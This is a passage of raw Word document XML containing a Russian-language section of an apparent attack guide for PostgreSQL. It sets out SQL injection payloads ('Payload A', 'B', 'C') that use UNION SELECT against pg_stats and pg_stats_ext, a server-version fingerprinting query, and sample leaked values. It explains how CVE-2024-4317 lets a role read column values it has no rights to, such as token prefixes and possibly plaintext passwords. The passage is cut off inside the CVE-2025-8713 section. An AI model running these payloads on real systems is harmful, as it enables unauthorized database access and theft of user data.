          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">    )</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F7CC637"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00CD1B07"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5792965C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Три колонки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text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">). Статистика приводится к </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> через явный </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>::text</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> от </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>anyarray</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D9F37D1" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload A — `pg_stats` baseline (роль имеет SELECT на колонку)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="502D1D8C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Базовый канал, работает на любой версии PG и не требует никакого CVE. Атакующий </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>уже</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> имеет SELECT на колонку, но не хочет/не может извлекать полные строки (например, таблица большая, в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уже агрегированы наиболее частые значения).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD36EC8" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Payload (подставляется вместо `widget`):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="634DD036" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, attname, most_common_vals::text FROM pg_stats WHERE schemaname = 'public' AND tablename = 'users' AND most_common_vals IS NOT NULL --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B3994A3" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B081612" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, value FROM widgets WHERE name = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="704376BF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, attname, most_common_vals::text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="672F5ECB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_stats</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F5470AF" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE schemaname = 'public'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0573A260" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND tablename = 'users'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4028E436" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">  AND most_common_vals IS NOT NULL --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BC7D351" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Что атакующий получает в колонке </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>value</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C02B340" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>country    {US,UK,DE,FR,RU,IN,BR,CA,AU,JP}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EA37C96" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>role       {viewer,editor,admin,owner}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70EF5444" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>email_domain {gmail.com,yahoo.com,outlook.com,company.com,hotmail.com}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2880A360" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>plan       {free,starter,pro,enterprise}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A08584A" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t>Для колонок с большой кардинальностью (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>email</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password_hash</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — массив пуст или короткий. Для enum-подобных колонок — почти всегда полный список реально использующихся значений. Для </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (если по ошибке хранится открытым текстом) — топ-10 наиболее популярных паролей по кластеру, без необходимости перебирать строки.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D2FF47C" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most_common_freqs</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (параллельный массив </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>real[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">) — частоты для каждого из MCV; полезно для оценки распределения. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>histogram_bounds</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — границы гистограммы для колонок с числовым/упорядоченным типом (квантильные значения).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13C31E94" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">ANALYZE-частота управляется autovacuum-ом; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> обновляется не мгновенно, но статистика типично свежее суток.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F78CBF6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload B — обход ACL через `pg_stats_ext` (R17 CVE-2024-4317)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18357F0D" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Применим на непатченных кластерах: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 14 ≤ 14.11</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15 ≤ 15.6</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>16 ≤ 16.2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. Атакующий — application-роль без SELECT на чужую колонку — читает </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>most_common_vals</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> чужой таблицы через </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5757D1AA" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Версионная проверка перед payload-ом</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (через 3.8.4 Payload B):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F134C95" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, 'version='||current_setting('server_version_num'), 0 --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026DEA91" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Если результат &lt; </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>140012</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>150007</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>160003</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> (для соответствующего мажора) — CVE применима. Дополнительно: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>даже если бинарь обновлён</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, без ручного </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>fix-CVE-2024-4317.sql</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> уязвимый view-определение остаётся (</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_dump</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> / </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_upgrade</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> не пересоздают системные views).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCC6882" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Payload:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D22709" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100" w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>x' UNION SELECT 0, statistics_name, most_common_vals::text FROM pg_stats_ext WHERE most_common_vals IS NOT NULL --</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A304CA6" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Сервер видит:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F967FB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:before="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>SELECT id, title, value FROM widgets WHERE name = 'x'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4016BC56" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>UNION SELECT 0, statistics_name, most_common_vals::text</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4343F2E7" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>FROM pg_stats_ext</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20CA6295" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="F4F4F4"/>
        <w:spacing w:after="100"/>
        <w:ind w:left="240"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>WHERE most_common_vals IS NOT NULL --'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F34BFBB" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> возвращает строки даже для тех колонок, на которые у атакующей роли нет SELECT-права — это и есть суть R17. Преимущество перед обычным </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: в </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>pg_stats_ext</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> хранятся </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>многоколонные</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MCV (если в кластере выполнен </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">CREATE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>STATISTICS ... (mcv) ON col1, col2 FROM tbl</w:t>
      </w:r>
      <w:r>
        <w:t>), и они тоже утекают. Для приложений, которые создают extended statistics для оптимизации (Django/Rails иногда генерируют их через миграции) — это утечка комбинаций значений, не только одиночных.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75AC14FD" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Что в выводе видно атакующему:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> конкретные значения колонок из </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tbl1.col1</w:t>
      </w:r>
      <w:r>
        <w:t>/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tbl1.col2</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, на которые у его роли нет SELECT-прав. Например, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>tenant_42.api_keys.token_prefix</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>{ak_live_, sk_test_, ak_dev_}</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> — это уже сильный сигнал, какие префиксы токенов выдаёт система; в комбинации с другими утечками — путь к подбору.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65AE269E" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="4"/>
      </w:pPr>
      <w:r>
        <w:t>Payload C — обход view ACL / RLS через custom operator (R26 CVE-2025-8713)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="650C6D36" w14:textId="77777777" w:rsidR="0019479F" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="140" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Применим на: </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>PG 13 ≤ 13.21</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>14 ≤ 14.18</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>15 ≤ 15.13</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
